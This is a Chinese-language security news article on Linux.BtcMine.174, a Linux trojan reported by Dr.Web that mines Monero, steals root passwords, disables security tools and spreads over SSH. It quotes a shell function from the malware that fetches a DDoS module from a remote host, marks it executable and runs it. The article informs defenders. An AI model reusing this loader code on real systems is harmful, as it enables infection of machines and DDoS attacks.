Linux平台出现新的恶性木马 挖矿的同时还会窃取密码
俄罗斯防病毒软件开发商Dr.Web最近发现针对Linux平台的恶性木马,该木马最主要的目的就是挖掘门罗币。
与多数比较普通的挖矿恶意软件不同的是,这个新木马附带多种恶意功能例如窃取根用户密码关闭安全软件。
同时也会搜寻受害者电脑上潜在的SSH连接信息以便感染更多机器,感染后继续植入挖矿木马继续进行传播。
示意图,图文无关
Linux.BtcMine.174挖矿木马:
虽然名称中带比特币但其实这是个挖掘门罗币的木马病毒,毕竟普通电脑想要挖掘比特币的话难度实在太大。
安全公司发现这个木马在感染受害者电脑后会执行多个操作,最主要的就是隐藏自己然后利用漏洞进行提权。
同时还会静悄悄地在后台收集根用户密码,如果成功窃取该密码则可以获得最高权限然后关闭各种安全软件。
如果搜寻到竞争对手的挖矿软件也会直接将其清除保证自己的利益最大化,将被感染的计算机当做矿机挖矿。
还会下载远程模块用来发动DDoS攻击:
function oh_cause_she_is_dead() { md5sum --help >/dev/null 2>&1 if [ "$?" = "0" ] then if [ `id -u` -eq "0" ] then DownloadFile "md5" "$mdfive_root" "http://$remote_host/syn" "$DownloadPath$DownloadFileName" else DownloadFile "md5" "$mdfive_user" "http://$remote_host/udp" "$DownloadPath$DownloadFileName" fi else if [ `id -u` -eq "0" ] then DownloadFile "size" "$DownloadFileSize" "http://$remote_host/syn" "$DownloadPath$DownloadFileName" else DownloadFile "size" "$DownloadFileSize" "http://$remote_host/udp" "$DownloadPath$DownloadFileName" fi fi chmod 755 "$DownloadPath$DownloadFileName" $DownloadPath$DownloadFileName }
搜寻SSH连接试图感染更多设备:
该木马还会在后台监视和搜寻潜在的SSH连接,如果用户使用SSH连接其他电脑或者服务器也会被木马抓到。
木马通过这种方式可以感染更多的电脑或者远程服务器,感染后再以新电脑为节点继续发散攻击其他计算机。
目前这款木马的主要传播方式还没有被检查清楚,不过针对Linux 平台的木马病毒也越来越多用户也要关注。